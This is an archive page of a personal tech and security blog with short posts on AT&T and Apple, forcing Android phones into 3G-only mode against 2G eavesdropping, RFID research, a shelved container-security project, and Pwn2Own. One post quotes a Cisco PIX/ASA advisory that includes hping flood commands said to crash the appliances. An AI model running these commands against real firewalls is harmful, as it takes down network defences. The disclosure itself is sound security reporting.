Archive for the ‘Hardware News’ Category

One of the good things about long airport layovers are the chances you finally get to catch up on your reading. Which is what it finally took to crack open my last issue of Wired magazine. I must say I was quite amused to find an article outlining the love/hate relationship between AT&T and Apple. Since I have never been an Apple fan I usually just tune out most news related to them which may explain why many of the details in the article was new to me. The tale ends up being a good example of a “FAILationship” and the fact that it starred two of my favorite US corporations just made it that much more comical. Read the article Here

Meanwhile, no matter how frustrated AT&T got with Jobs, it had little choice but to stand by him. It would have been devastating to lose the iPhone after investing billions of dollars and endless reputational capital. And so the relationship carried on, dysfunctional and loveless though it was. Divorce, at least for the time being, was not an option.

iphone blowup

Freshly back from a new round of security based conferences I will take a moment to point out one of the more interesting topics for me this time around.
The discussion on Cell Phone Spying (not that I made it inside the actual talk with the ungodly line). More specifically how by using a frequency flooding technique on 2G networks its possible to do a MiTM type of ease drop on conversations & data. You can read more about it Here

As mentioned in the article a workaround for this issue would be to disable 2G mode on GSM phones.

Here is the quick and dirty way to do this in Android (tested on rooted phone)
DISCLAIMER: Forcing 3G mode will use more battery life
Also if your not on GSM don’t try this @ home…duh

Open Dialer and Enter: *#*#4636*#*#
After inputing the number you will be prompted with a “Testing” menu
Choose “Phone Information”
Scroll all the way down “Set preferred network type” and change this setting to WCDMA_only
That’s it!

Droid 3G Only Mode

I take no credit for the fix above as it was posted on the android dev forums.
Also this protects you from this exploit and any targeting 2G only, but many other GSM insecurities still exist. Another related topic also discussed was using a TOR client to obfuscate your traffic and make yourself much more anonymous. I will cover this topic a bit more in some upcoming Android based posts.

RSA researcher Ari Juels sat down with to discuss various topics. One of which was the constrained capabilities of RFID (like wireless bar codes), and how it affects the security posture needed to secure these devices.

But, in fact, it’s possible to shoehorn in capabilities for which these tags were not explicitly designed. For example, in RSA Labs, we proposed techniques to commandeer access control features on the tags — those are an optional security mechanism — and even the privacy feature on the tags, what’s called the “kill” function, a self-destruct feature that’s meant to protect consumer privacy. We’ve shown ways the tags can be commandeered for authentication.

Read More Here …

Suffering the same fate as many other technology projects during our economic slowdown it appears the CommerceGuard project has had it operations suspended by GE. The CommerceGuard project was responsible for development of the CommerceGuard Container Security Device System (CSD) whose purpose was to track and secure shipment containers. The system was developed to meet the needs set forth by the Department of Homeland Security(DHS) which called for

a sophisticated security system within the electronics industry that can detect unauthorized breaches on all six sides of a standard cargo container or an intrusion through the door while also monitor and relay conditions inside the container such as humidity temperature and oxygen levels.

Put simply.
A more effective and secure way to track and audit who is accessing cargo containers shipped before it hits our shorelines.

Still early February of this year began to signal the beginning of the end for the project when it appeared that GE was not interested in further testing the technology. This was done just prior to a critical round of testing by DHS. Perhaps the reason for the hesitation in further testing was because the solution uses RFID technology. A technology proven long ago to be susceptible to hijacking & hacking attempts. The company sited a variety of reasons from developmental costs, speed of updated data, to maintenance costs.

A bit more on the CSD technology concept.
It uses 2 devices to monitor when ever a cargo container is opened or closed. The internal wall sensor & the door sensor work in unison to monitor and make a note of the date, time, and location of containers as they are accessed. It will also audit the amount of times this information has been queried and by whom. This process is kicked off by the shipper as they seal and virtually “Lock” their container using a hand held mobile device. This information can be referenced by receiving ports and either inspected or cleared based partly on this type of access audit. It can also be exported to various standardized data formats.

EDIT: This post was edited to correct inaccuracies on some of the details provided. Apologies for the Error..

Some fairly critical issues disclosed on a very popular security product.

Cisco PIX Security Appliance and ASA 5500 Series Adaptive Security Appliance are prone to multiple denial-of-service vulnerabilities, an ACL-bypass vulnerability, and an authentication-bypass vulnerability.

Read More Here …
An attacker can use readily available network utilities to exploit these issues.
The following example data is sufficient to exploit the denial-of-service issue affecting PIX and ASA:

/*Utilize 1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a

As an avid user of the Google Phone, and someone who LOVES the Android OS. We have added a new section to the site “LSYiPDT” or Let’s see your iPhone do this. Now it would be easy to point out the obvious tasks like run background apps, cut/paste, scan barcodes, last longer than 24hrs w/o a recharge, or not monopolized by AT&(I will feed your private info to the US government)T . But to prevent fan-boy flamage we will try to stick with the more advanced tasks that really set Android apart from the whack…err..pack.

Those cool guys at Hack-A-Day have a fun article on how to hack your old atari system to make it S-Video compatible thus making it actually usable without that old TV slider switch. I think this will be a good reference to perform a similar hack on my ancient Tandy PC that I really want to see boot up again. Wonder what I can get to run on this old Tandy to make it useful again, and where did I put all those old Floppy disks and program cartridges?

Read More on the S-Video hack here

Since I did not get out to Black Hat DC last month I was just reviewing the papers and came across one very interesting one. Aside from the white paper I also enjoy the story about the new “Friends” disclosing such an exploit brings. All in all a good read and just more wood for the fires of security threats in our digital age.. I should point out that the founder and CEO of the company to disclose this is pretty hot, and the fact that she is smarts.. and can hack increase the hot meter by at least x10.

Read more about it here

During the PWN2OWN security competition the hacker best known for hacking the iPhone, discusses hacking fully patched Macbooks in under 2 min shares some information.

Yes, I took down the Mac in under a minute each time. However, this doesn’t show the fact that I spent many days doing research and writing the exploit before the day of the competition. It only looks Hollywood because you don’t see the hard work in the preparation. If you set me down in front of an application I’ve never seen before and told me I have 2 minutes to hack it, as is often the case in movies, I’d have no more luck than your grandma at accomplishing it. Well, maybe a little more of a chance, but not much!

As for comparing this to other competitions, most other competitions face teams of hackers against programs written for the contest with bugs purposely added. I like Pwn2Own because its against real software and the bugs found are real bugs and are given to the vendors to fix, so some good comes out of it too.

Similar to the functions of the new Kindle device. A new high tech document scanner with OCR functions built in will not only scan documents or books for you but also reads them back to you.

Now if only it could turn its own pages!

Plustek Reader